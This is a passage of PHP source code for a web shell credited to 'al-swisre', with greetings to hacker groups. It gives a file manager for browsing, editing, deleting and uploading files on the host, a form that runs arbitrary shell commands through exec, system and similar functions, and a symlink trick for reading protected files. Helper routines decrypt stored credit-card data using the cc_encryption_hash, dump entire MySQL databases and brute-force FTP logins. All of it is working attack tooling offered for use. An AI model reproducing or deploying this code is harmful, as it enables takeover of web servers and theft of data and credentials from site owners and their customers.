2797. echo "<tr><td><b>Age :</b> 2/1995</td></tr>";
2798. echo "<tr><td><b>twitter :</b> <a target='_blank'href='https://twitter.com/#!/al_swisre'>al_swisre</a></td></tr>";
2799. echo "<tr><td><b>S.Greetz 2 :</b> Mr.Alsa3ek - Ejram Hacker</td></tr>";
2800. echo "<tr><td><b>Greetz 2 :</b> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 - Mr.Pixy </td></tr><tr><td><b>And :</b> Mr.Black - IraQiaN-r0x - Oxygen - locked - n4ss .. and All members of v4-team.com </td></tr></div>";
2801.  
2802. exit;
2803. break;
2804.  
2805.  
2806.  
2807.  
2808.  
2809.  
2810.  
2811.  
2812.  
2813. }
2814.  
2815.  
2816.  
2817.  
2818.  
2819.  
2820.  
2821.  
2822. }
2823. else
2824. {
2825. /////////// File Manager //////////////
2826.  
2827. $sws = 'al-swisre' ;
2828. if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;}
2829.  
2830. if(@$_GET['dir']){
2831. $dir = $_GET['dir'];
2832. if($dir != 'nullz') $dir = @cleandir($dir);
2833. }
2834.  
2835. $curdir = @cleandir(@getcwd());
2836. $self = $_SERVER['PHP_SELF'];
2837. $me = $_SERVER['PHP_SELF'];
2838.  
2839. if($dir=="") $dir = $curdir;
2840. $dirx = explode(DIRECTORY_SEPARATOR, $dir);
2841. $files = array();
2842. $folders = array();
2843. echo"<br /><div class='t33p'><table cellpadding='0' align='center' width='100%' >";
2844. echo"<tr><td style=\"text-align: left\" >";
2845. echo" Your path : &nbsp;";
2846. for($i=0;$i<count($dirx);$i++){
2847. @$totalpath .= $dirx[$i] . DIRECTORY_SEPARATOR;
2848. echo("<a href='" . $me . "?dir=$totalpath" . "'>$dirx[$i]</a>" . DIRECTORY_SEPARATOR);
2849. }
2850. echo "<td></tr></table></div><br />";
2851. echo"<div class='t3p'><table cellpadding='0' align='center' width='100%' >";
2852. echo"<tr><td>Name</td><td>Size</td><td>Modify</td><td>Owner/Group</td><td>Permissions</td><td>Option<td></td></tr>";
2853. if ($handle = @opendir($dir)) {
2854. while (false != ($link = readdir($handle))) {
2855. $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ;
2856. $gr = @posix_getgrgid(@filegroup($dir."/".$link));
2857. if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){
2858. $file = array();
2859. @$file['link'] = "<a href='$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link'>[ $link ]</font></a>";
2860. $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
2861. $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
2862.  
2863. $folder = "<tr><td> ".$file['link']."</td><td>dir</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
2864.  
2865. array_push($folders, $folder);
2866. }
2867. else{
2868. $file = array();
2869. $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : "";
2870. $file['pir'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@wsoPermsColor($dir."/".$link)."</a>";
2871. $file['pir2'] = "<a href='?sws=chmod&file=$link&dir=$dir'\">".@perm($dir."/".$link)."</a>";
2872. $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2);
2873. @$file['link'] = "<a href='?sws=edit&file=$link&dir=$dir'\">".$link ."</a>";
2874. $file = "<tr><td>".$file['link']."</td><td>".$file['size']."</td><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><td>".$on3['name']."/".$gr['name']."</td><td>".$file['pir']."&nbsp;&nbsp;&nbsp;".$file['pir2']."<td><a href='?sws=edit&file=$link&dir=$dir'\">E</a> - <a href='?sws=rname&file=$link&dir=$dir'\">R</a> - <a href='?sws=chmod&file=$link&dir=$dir'\">C</a> - <a href='?sws=dow&file=$link&dir=$dir'\">D</a> - <a href='?sws=rm&file=$link&dir=$dir'\">rm</a></td></td></tr></div>" ;
2875. array_push($files, $file);
2876. }
2877.  
2878. }
2879. asort($folders);
2880. asort($files);
2881.  
2882. foreach($folders as $folder) echo $folder;
2883. foreach($files as $file) echo $file;
2884. echo "</table></div>" ;
2885. closedir($handle);
2886.  
2887.  
2888. }
2889.  
2890.  
2891.  
2892.  
2893.  
2894.  
2895.  
2896.  
2897.  
2898.  
2899.  
2900.  
2901.  
2902.  
2903. }
2904.  
2905.  
2906. if ($_GET['sws'] == 'rname')
2907. {
2908.  
2909. $dir = $_GET['dir'];
2910.  
2911. $file = $_GET['file'];
2912.  
2913. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
2914.  
2915. if (!isset($_POST['edit']))
2916. {
2917.  
2918. echo "<br />
2919. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
2920. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
2921. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
2922. <form method='post'>
2923. new name : <input type='text' value='$file' name='name' /><br /><br />
2924. <input type='submit' value='edit' name='edit' />
2925.  
2926. </form>
2927.  
2928. ";
2929. }else
2930. {
2931.  
2932. $new = $_POST['name'];
2933.  
2934. $rn = @rename ($dir."/".$file,$dir."/".$new);
2935.  
2936. if(!$rn)
2937. {
2938.  
2939.  
2940. @cmd("cd $dir;mv $file $new ");
2941.  
2942.  
2943. }else
2944. {
2945.  
2946. echo "<br /><br />Name change successfully";
2947.  
2948. echo "<br /><br /><a href='?sws=rname&file=$new&dir=$dir'\">[ Back ]</a>";
2949.  
2950. }
2951.  
2952.  
2953.  
2954. }
2955. }
2956.  
2957.  
2958.  
2959.  
2960.  
2961. if ($_GET['sws'] == 'chmod')
2962. {
2963.  
2964. $dir = $_GET['dir'];
2965.  
2966. $file = $_GET['file'];
2967.  
2968. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
2969.  
2970. if (!isset($_POST['edit']))
2971. {
2972.  
2973. echo "<br />
2974. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
2975. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div><br />
2976. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
2977. <form method='post'>
2978. File to chmod: <input type='text' value=".$dir."/".$file." name='file' />&nbsp;&nbsp;&nbsp;<select name=\"ch\">
2979. <option value=\"755\">755</option>
2980. <option value=\"777\">777</option>
2981. <option value=\"644\">644</option>
2982. </select>
2983. <br /><br /><input type='submit' value='chmod' name='edit' />
2984.  
2985. </form>
2986.  
2987. ";
2988. }
2989. else
2990. {
2991.  
2992. $pir = $_POST['ch'];
2993.  
2994. if ($pir == '755'
2995. )
2996.  
2997. {
2998. $cd = @chmod($_POST['file'],0775);
2999. }
3000. elseif ($pir == '777')
3001. {
3002. $cd = @chmod($_POST['file'],0777);
3003.  
3004. }
3005. elseif ($pir == '644')
3006. {
3007.  
3008. $cd = $cd = @chmod($_POST['file'],0644);
3009.  
3010. }
3011.  
3012. if(!$cd)
3013. {
3014. echo "ERROR";
3015.  
3016. }else
3017. {
3018.  
3019. echo "changed Successfully";
3020. echo "<br /><br /><a href='?sws=chmod&file=$file&dir=$dir'\">[ Back ]</a>";
3021.  
3022.  
3023. }
3024.  
3025. }
3026. }
3027.  
3028. if ($_GET['sws'] == 'edit')
3029. {
3030.  
3031. $file = $_GET['file'];
3032. $dir = $_GET['dir'];
3033.  
3034. if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
3035.  
3036. if (!isset($_POST['ed']))
3037. {
3038.  
3039. $fil33 = @fopen($dir."/".$file, 'r');
3040. $content = @fread($fil33, @filesize($dir."/".$file));
3041.  
3042. echo "
3043. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
3044. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
3045. <br />
3046. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
3047. <form method=\"post\">
3048. <br /><textarea cols=\"85\" rows=\"25\" name=\"fil3\">";
3049. echo htmlentities($content) . "\n";
3050. echo '
3051. </textarea>
3052. <br /><br />
3053. <input type="submit" name="ed" value="Save !"/>
3054. </form>
3055.  
3056. ';
3057.  
3058. }
3059. else
3060. {
3061.  
3062.  
3063. $oo = @fopen($dir."/".$file, 'w');
3064. $ow = @fwrite($oo, @stripslashes($_POST['fil3']));
3065. @fclose($oo);
3066. if (!$ow){echo "Error";}else {
3067. echo header("Location: ?sws=edit&file=$file&dir=$dir");
3068. }
3069.  
3070.  
3071.  
3072.  
3073.  
3074. }
3075.  
3076.  
3077.  
3078.  
3079. }
3080. else if ($_GET['sws'] == 'dow')
3081. {
3082. $file = $_GET['file'];
3083. $dir = $_GET['dir'];
3084.  
3085. @sa_download ($dir."/".$file);
3086.  
3087.  
3088. }
3089. /////////////////////////////////////////////////////
3090. if ($_GET['sws'] == 'rm')
3091. {
3092.  
3093. $dir = $_GET['dir'];
3094.  
3095. $file = $_GET['file'];
3096.  
3097. if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href='$pg'\">[ Back ]</a>"; exit;}
3098.  
3099. if (!isset($_POST['edit']))
3100. {
3101.  
3102. echo "<br />
3103. <div class=\"cont3\"> <a href='?sws=edit&file=$file&dir=$dir'\">Edit</a>&nbsp;&nbsp;&nbsp;<a href='?sws=rname&file=$file&dir=$dir'\">Rename</a>&nbsp;&nbsp;<a href='?sws=chmod&file=$file&dir=$dir'\">Chmod</a>&nbsp;&nbsp;<a href='?sws=dow&file=$file&dir=$dir'\">Download</a>
3104. <a href='?sws=rm&file=$file&dir=$dir'\">Delete</a></div>
3105. <br />
3106. dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br />
3107. <form method='post'>
3108. <input type='submit' value='Delete' name='edit' />
3109.  
3110. </form>
3111.  
3112. ";
3113. }else
3114. {
3115.  
3116.  
3117. $rn = @unlink ($dir."/".$file);
3118.  
3119. if(!$rn)
3120. {
3121.  
3122.  
3123. $rn = @rmdir ($dir."/".$file);
3124.  
3125.  
3126.  
3127. }elseif (!$rn)
3128. {
3129. $rn = @cmd("cd $dir;rm $file");
3130.  
3131. }
3132. else if (!$rn){@cmd ("cd $dir;rm -r $file");}
3133. else{
3134.  
3135. echo header("Location: $pg?dir=$dir");
3136. }
3137.  
3138. echo header("Location: $pg?dir=$dir");
3139.  
3140. }
3141. }
3142. ///////////////////////////////////////////////////////////////////////////////// mkdir //////////////////////////////
3143.  
3144. else if ($_GET['sws'] == 'mkdir')
3145. {
3146.  
3147.  
3148. $dir = $_POST['dir'];
3149. $file = $_POST['n4me'];
3150.  
3151. $mkdir = @mkdir ($dir."/".$file,0755);
3152.  
3153. if (!$mkdir){@cmd ("mkdir $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
3154. header("Location: $pg?dir=$dir");
3155.  
3156. }
3157.  
3158.  
3159. else if ($_GET['sws'] == 'mkfile')
3160. {
3161.  
3162. $dir = $_POST['dir'];
3163. $file = $_POST['n4me'];
3164.  
3165.  
3166. $mkdir = @fopen($dir."/".$file,'w');
3167.  
3168. if (!$mkdir){@cmd ("touch $dir/$file ");}else {header("Location: $pg?dir=$dir"); }
3169.  
3170.  
3171. }
3172.  
3173. else if ($_GET['sws'] == 'up')
3174. {
3175.  
3176.  
3177. $dir = $_POST['dir'];
3178.  
3179.  
3180. if(@move_uploaded_file($_FILES['upfile']['tmp_name'], $dir."/".$_FILES['upfile']['name'])) { header("Location: $pg?dir=$dir"); }
3181. else { echo '<br /><br />Not uploaded !!<br><br>';exit; }
3182.  
3183. }
3184.  
3185.  
3186. //////////////////////////// read file /////////////////////
3187.  
3188. else if ($_GET['sws'] == 'rfile')
3189. {
3190.  
3191.  
3192.  
3193. $file = $_POST['n4me'];
3194.  
3195. echo "dir : <a href='$pg?dir=".$_GET['dir']."'>".$_GET['dir']."</a>&nbsp;&nbsp;&nbsp; file name : ".$_GET['file']." <br /> <br /> ";
3196.  
3197. if (!isset($file)){$file = $_GET['dir']."/".$_GET['file'];}
3198.  
3199. echo "<div>";
3200.  
3201. $r3ad = @fopen($file, 'r');
3202. if ($r3ad){
3203. $content = @fread($r3ad, @filesize($file));
3204. echo "<pre>".htmlentities($content)."</pre>";
3205. }
3206. else if (!$r3ad)
3207. {
3208. echo "<pre>";
3209. $r3ad = @show_source($file) ;
3210. echo "</pre>";
3211. }
3212. else if (!$r3ad)
3213. {
3214. echo "<pre>";
3215. $r3ad = @highlight_file($file);
3216. echo "</pre>";
3217. }
3218. else if (!$r3ad)
3219. {
3220. echo "<pre>";
3221. $sm = @symlink($file,'sym.txt');
3222.  
3223.  
3224. if ($sm){
3225. $r3ad = @fopen('sym.txt', 'r');
3226. $content = @fread($r3ad, @filesize($dir."/".$file));
3227. echo "<pre>".htmlentities($content)."</pre>";
3228. }
3229. }
3230.  
3231. echo "</div>";
3232.  
3233. //////////////////////// cmd /////////////////////////////////
3234.  
3235.  
3236. }else if ($_GET['sws'] == 'cmd')
3237. {
3238. $cmd = $_POST['n4me'];
3239. $dir = $_POST['dir'];
3240.  
3241. if (isset($cmd))
3242. {
3243.  
3244.  
3245. echo "<br /><textarea cols='65' rows='25' name='fil3'> ";
3246.  
3247. echo @cmd("cd $dir;$cmd") ;
3248.  
3249. echo " </textarea>";
3250.  
3251.  
3252.  
3253. }
3254.  
3255.  
3256.  
3257.  
3258. }
3259. else if ($_GET['sws'] == 'site')
3260. {
3261.  
3262.  
3263.  
3264.  
3265. $read = @file_get_contents("http://networktools.nl/reverseip/$ips") ;
3266.  
3267. $sit3 = @findit($read,"<pre>","</pre>");
3268.  
3269. echo "<br /><div class='site'><pre> ";
3270.  
3271.  
3272. echo $sit3;
3273.  
3274. echo "</pre> </div>";
3275.  
3276. exit;
3277.  
3278.  
3279. }
3280.  
3281.  
3282.  
3283.  
3284.  
3285.  
3286.  
3287.  
3288.  
3289.  
3290. if(@$_GET['dir']){
3291. $dir = $_GET['dir'];
3292. if($dir != 'nullz') $dir = cleandir($dir);
3293. }
3294.  
3295. echo "
3296.  
3297. <br /><br />
3298. </div><div class='d0n'>
3299. <br /><br />
3300. <table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\" >
3301.  
3302. <tr><td><form method='GET''>
3303. Change dir : <br />
3304. <input type='text' name='name' value='$dir' size='25' />
3305. <input type='hidden' name='dir' value='$dir' />
3306.  
3307. <input type='submit' value='Go' />
3308. </form> </td>
3309.  
3310. <td style=\"float: left\"> <form method='POST' action='$pg?sws=mkdir' >
3311.  
3312. Make dir :<br />
3313. <input type='text' name='n4me' size='25' />
3314. <input type='hidden' name='dir' value='$dir' />
3315. <input type='submit' value='Go' /></div>
3316. </form></td></tr>
3317.  
3318.  
3319. <tr><td><form method='post' action='$pg?sws=rfile'>
3320. read file : <br />
3321. <input type='text' name='n4me' size='25' />
3322. <input type='hidden' name='dir' value='$dir' />
3323. <input type='submit' value='Go' />
3324. </form> </td>
3325.  
3326.  
3327. <td style=\"float: left\"> <form method='post' action='$pg?sws=mkfile' >
3328.  
3329. Make file :<br />
3330. <div style=\"text-align: right\">
3331. <input type='text' name='n4me' size='25' />
3332. <input type='hidden' name='dir' value='$dir' />
3333. <input type='submit' value='Go' /></div>
3334. </form></td></tr>
3335.  
3336.  
3337. <tr><td><form method='POST' action='$pg?sws=cmd'>
3338. Execute : <br />
3339. <input type='text' name='n4me' size='25' />
3340. <input type='hidden' name='dir' value='$dir' />
3341. <input type='submit' value='Go' />
3342. </form> </td>
3343. <b></b>
3344.  
3345.  
3346. <td style=\"float: left\">
3347. <form method='POST' enctype=\"multipart/form-data\" action='$pg?sws=up' >
3348. Upload file :<br />
3349. <div style=\"text-align: right\">
3350. <input type='file' name='upfile' value='Choose file' size='21' />
3351. <input type='hidden' name='dir' value='$dir' />
3352. <input type='submit' value='Up' />
3353. </form></td></tr>
3354.  
3355.  
3356.  
3357. </table>
3358. </div>
3359. ";
3360. //////////////////////////////////////// exit :d //////////////////////////
3361.  
3362.  
3363.  
3364.  
3365.  
3366.  
3367.  
3368.  
3369.  
3370.  
3371.  
3372.  
3373.  
3374.  
3375.  
3376.  
3377.  
3378.  
3379.  
3380.  
3381.  
3382.  
3383.  
3384. function cmd($cfe)
3385. {
3386. $res = '';
3387. if (!empty($cfe))
3388. {
3389. if(function_exists('exec'))
3390. {
3391. @exec($cfe,$res);
3392. $res = join("\n",$res);
3393. }
3394. elseif(function_exists('shell_exec'))
3395. {
3396. $res = @shell_exec($cfe);
3397. }
3398. elseif(function_exists('system'))
3399. {
3400. @ob_start();
3401. @system($cfe);
3402. $res = @ob_get_contents();
3403. @ob_end_clean();
3404. }
3405. elseif(function_exists('passthru'))
3406. {
3407. @ob_start();
3408. @passthru($cfe);
3409. $res = @ob_get_contents();
3410. @ob_end_clean();
3411. }
3412. elseif(@is_resource($f = @popen($cfe,"r")))
3413. {
3414. $res = "";
3415. while(!@feof($f)) { $res .= @fread($f,1024); }
3416. @pclose($f);
3417. }
3418. }
3419. return $res;
3420. }
3421.  
3422. function sa($i)
3423. {
3424. return @str_repeat("&nbsp;",$i);
3425. }
3426.  
3427.  
3428.  
3429. function decrypt ($string,$cc_encryption_hash)
3430. {
3431. $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
3432. $hash_key = _hash ($key);
3433. $hash_length = strlen ($hash_key);
3434. $string = base64_decode ($string);
3435. $tmp_iv = substr ($string, 0, $hash_length);
3436. $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
3437. $iv = $out = '';
3438. $c = 0;
3439. while ($c < $hash_length)
3440. {
3441. $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
3442. ++$c;
3443. }
3444.  
3445. $key = $iv;
3446. $c = 0;
3447. while ($c < strlen ($string))
3448. {
3449. if (($c != 0 AND $c % $hash_length == 0))
3450. {
3451. $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
3452. }
3453.  
3454. $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
3455. ++$c;
3456. }
3457.  
3458. return $out;
3459. }
3460.  
3461.  
3462. function _hash ($string)
3463. {
3464. $hash = (function_exists ('sha1')) ? sha1($string):md5($string);
3465. $out = '';
3466. $c = 0;
3467. while ($c < strlen ($hash))
3468. {
3469. $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
3470. $c += 2;
3471. }
3472. return $out;
3473. }
3474.  
3475. function backup_tables($path,$host,$user,$pass,$name,$tables = '*')
3476. {
3477.  
3478. $link = @mysql_connect($host,$user,$pass);
3479. @mysql_select_db($name,$link);
3480.  
3481. //get all of the tables
3482. if($tables == '*')
3483. {
3484. $tables = array();
3485. $result = @mysql_query('SHOW TABLES');
3486. while($row = @mysql_fetch_row($result))
3487. {
3488. $tables[] = $row[0];
3489. }
3490. }
3491. else
3492. {
3493. $tables = is_array($tables) ? $tables : explode(',',$tables);
3494. }
3495.  
3496. //cycle through
3497. foreach($tables as $table)
3498. {
3499. $result = mysql_query('SELECT * FROM '.$table);
3500. $num_fields = mysql_num_fields($result);
3501.  
3502. $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
3503. $return.= "\n\n".$row2[1].";\n\n";
3504.  
3505. for ($i = 0; $i < $num_fields; $i++)
3506. {
3507. while($row = mysql_fetch_row($result))
3508. {
3509. $return.= 'INSERT INTO '.$table.' VALUES(';
3510. for($j=0; $j<$num_fields; $j++)
3511. {
3512. $row[$j] = addslashes($row[$j]);
3513. $row[$j] = ereg_replace("\n","\\n",$row[$j]);
3514. if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
3515. if ($j<($num_fields-1)) { $return.= ','; }
3516. }
3517. $return.= ");\n";
3518. }
3519. }
3520. $return.="\n\n\n";
3521. }
3522.  
3523. //save file
3524. $handle = @fopen($path,'w+');
3525. @fwrite($handle,$return);
3526. @fclose($handle);
3527. }
3528.  
3529. function search($string){
3530. $q = mysql_query("SHOW TABLE STATUS");
3531. $data = array();
3532. while($table = mysql_fetch_array($q)){
3533. $query = "SELECT * FROM $table[Name]";
3534. $result = mysql_query($query);
3535. $row = @mysql_fetch_assoc($result);
3536. if(!$row){
3537. continue;
3538. }
3539. $columns = array_keys($row);
3540. $data[$table['Name']] = $columns;
3541. }
3542. $tables = array();
3543. foreach($data as $table=>$columns){
3544. $query = "SELECT * FROM `$table` WHERE ";
3545. foreach($columns as $key=>$column){
3546. if($key == 0){
3547. $query .= "`$column` LIKE '%$string%'";
3548. }else{
3549. $query .= " OR `$column` LIKE '%$string%'";
3550. }
3551. }
3552. $query = mysql_query($query);
3553. $result = mysql_num_rows($query);
3554. if($result > 0){
3555. $tables[] = $table;
3556. }
3557. }
3558. $founded = array();
3559. foreach($tables as $table){
3560. $columns = $data[$table];
3561. foreach($columns as $column){
3562. $query = "SELECT * FROM `$table` WHERE `$column` LIKE '%$string%'";
3563. $query = mysql_query($query);
3564. $result = mysql_num_rows($query);
3565. if($result > 0){
3566. $founded[] = array('table'=>$table,'column'=>$column);
3567. }
3568. }
3569. }
3570. return $founded;
3571. }
3572.  
3573. function cleandir($d){ // Function to clean up the $dir and $curdir variables
3574. $d = @realpath($d);
3575. $d = str_replace("\\\\", "\\", $d);
3576. $d = str_replace("////", "//", $d);
3577. return($d);
3578. }
3579.  
3580. function wsoPermsColor($f) {
3581. if (!@is_readable($f))
3582. return '<font color=#FF0000>' . @wsoPerms(@fileperms($f)) . '</font>';
3583. elseif (!@is_writable($f))
3584. return '<font color=white>' . @wsoPerms(@fileperms($f)) . '</font>';
3585. else
3586. return '<font color=#25ff00>' . @wsoPerms(@fileperms($f)) . '</font>';
3587. }
3588.  
3589. function wsoPerms($p) {
3590. if (($p & 0xC000) == 0xC000)$i = 's';
3591. elseif (($p & 0xA000) == 0xA000)$i = 'l';
3592. elseif (($p & 0x8000) == 0x8000)$i = '-';
3593. elseif (($p & 0x6000) == 0x6000)$i = 'b';
3594. elseif (($p & 0x4000) == 0x4000)$i = 'd';
3595. elseif (($p & 0x2000) == 0x2000)$i = 'c';
3596. elseif (($p & 0x1000) == 0x1000)$i = 'p';
3597. else $i = 'u';
3598. $i .= (($p & 0x0100) ? 'r' : '-');
3599. $i .= (($p & 0x0080) ? 'w' : '-');
3600. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
3601. $i .= (($p & 0x0020) ? 'r' : '-');
3602. $i .= (($p & 0x0010) ? 'w' : '-');
3603. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
3604. $i .= (($p & 0x0004) ? 'r' : '-');
3605. $i .= (($p & 0x0002) ? 'w' : '-');
3606. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
3607. return $i;
3608. }
3609.  
3610. function perm($file)
3611. {
3612. if(file_exists($file))
3613. {
3614. return @substr(@sprintf('%o', @fileperms($file)), -4);
3615. }
3616. else
3617. {
3618. return "????";
3619. }
3620. }
3621.  
3622. function sa_download($path)
3623. {
3624. header('Content-Description: File Transfer');
3625. header('Content-Type: application/octet-stream');
3626. header('Content-Disposition: attachment; filename='.basename($path));
3627. header('Content-Transfer-Encoding: binary');
3628. header('Expires: 0');
3629. header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
3630. header('Pragma: public');
3631. header('Content-Length: ' . filesize($path));
3632. ob_clean();
3633. flush();
3634. readfile($path);
3635. exit;
3636. }
3637.  
3638. function findit($mytext,$starttag,$endtag) {
3639. $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
3640. $posRight = @stripos($mytext,$endtag,$posLeft+1);
3641. return @substr($mytext,$posLeft,$posRight-$posLeft);
3642. }
3643.  
3644. function MsSQL()
3645. {
3646. if(@function_exists('mssql_connect'))
3647. {
3648. $msSQL = '<font color="red">ON</font>';
3649. }
3650. else
3651. {
3652. $msSQL = '<font color="green">OFF</font>';
3653. }
3654. return $msSQL;
3655. }
3656. function MySQL2()
3657. {
3658. $mysql_try = @function_exists('mysql_connect');
3659. if($mysql_try)
3660. {
3661. $mysql = '<font color="red">ON</font>';
3662. }
3663. else
3664. {
3665. $mysql = '<font color="green">OFF</font>';
3666. }
3667. return $mysql;
3668. }
3669. function Gzip()
3670. {
3671. if (@function_exists('gzencode'))
3672. {
3673. $gzip = '<font color="red">ON</font>';
3674. }
3675. else
3676. {
3677. $gzip = '<font color="green">OFF</font>';
3678. }
3679. return $gzip;
3680. }
3681. function MysqlI()
3682. {
3683. if (@function_exists('mysqli_connect'))
3684. {
3685. $mysqli = '<font color="red">ON</font>';
3686. }
3687. else
3688. {
3689. $mysqli = '<font color="green">OFF</font>';
3690. }
3691. return $mysqli;
3692. }
3693. function MSQL()
3694. {
3695. if (@function_exists('msql_connect'))
3696. {
3697. $mSql = '<font color="red">ON</font>';
3698. }
3699. else
3700. {
3701. $mSql = '<font color="green">OFF</font>';
3702. }
3703. return $mSql;
3704. }
3705. function PostgreSQL()
3706. {
3707. if(@function_exists('pg_connect'))
3708. {
3709. $postgreSQL = '<font color="red">ON</font>';
3710. }
3711. else
3712. {
3713. $postgreSQL = '<font color="green">OFF</font>';
3714. }
3715. return $postgreSQL;
3716. }
3717.  
3718. function Oracle()
3719. {
3720. if(@function_exists('ocilogon'))
3721. {
3722. $oracle = '<font color="red">ON</font>';
3723. }
3724. else
3725. {
3726. $oracle = '<font color="green">OFF</font>';
3727. }
3728. return $oracle;
3729. }
3730.  
3731.  
3732. function RegisterGlobals()
3733. {
3734. if(@ini_get('register_globals'))
3735. {
3736. $registerg= '<font color="red">ON</font>';
3737. }
3738. else
3739. {
3740. $registerg= '<font color="green">OFF</font>';
3741. }
3742. return $registerg;
3743. }
3744. function HardSize($size)
3745. {
3746. if($size >= 1073741824)
3747. {
3748. $size = @round($size / 1073741824 * 100) / 100 . " GB";
3749. }
3750. elseif($size >= 1048576)
3751. {
3752. $size = @round($size / 1048576 * 100) / 100 . " MB";
3753. }
3754. elseif($size >= 1024)
3755. {
3756. $size = @round($size / 1024 * 100) / 100 . " KB";
3757. }
3758. else
3759. {
3760. $size = $size . " B";
3761. }
3762. return $size;
3763. }
3764. function Curl()
3765. {
3766. if(extension_loaded('curl'))
3767. {
3768. $curl = '<font color="red">ON</font>';
3769. }
3770. else
3771. {
3772. $curl = '<font color="green">OFF</font>';
3773. }
3774. return $curl;
3775. }
3776.  
3777. function magicQouts()
3778. {
3779. $mag=get_magic_quotes_gpc();
3780. if (empty($mag))
3781. {
3782. $mag = '<font color="green">OFF</font>';
3783. }
3784. else
3785. {
3786. $mag= '<font color="red">ON</font>';
3787. }
3788. return $mag;
3789. }
3790.  
3791. function openBaseDir()
3792. {
3793. $openBaseDir = @ini_get("open_basedir");
3794. if (!$openBaseDir)
3795. {
3796. $openBaseDir = '<font color="green">OFF</font>';
3797. }
3798. else
3799. {
3800. $openBaseDir = '<font color="red">ON</font>';
3801. }
3802. return $openBaseDir;
3803. }
3804.  
3805. function ftp_check($host,$user,$pass,$timeout){
3806. $ch = curl_init();
3807. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
3808. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3809. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
3810. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
3811. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
3812. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
3813. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
3814. $data = curl_exec($ch);
3815. if ( curl_errno($ch) == 28 ) {
3816.  
3817. print "<b> Error : Connection timed out </b>";
3818. exit;}
3819.  
3820. elseif ( curl_errno($ch) == 0 ){
3821.  
3822. print
3823. "
3824. <b>found username : <font color='#FF0000'> $user </font> - password :
3825. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);
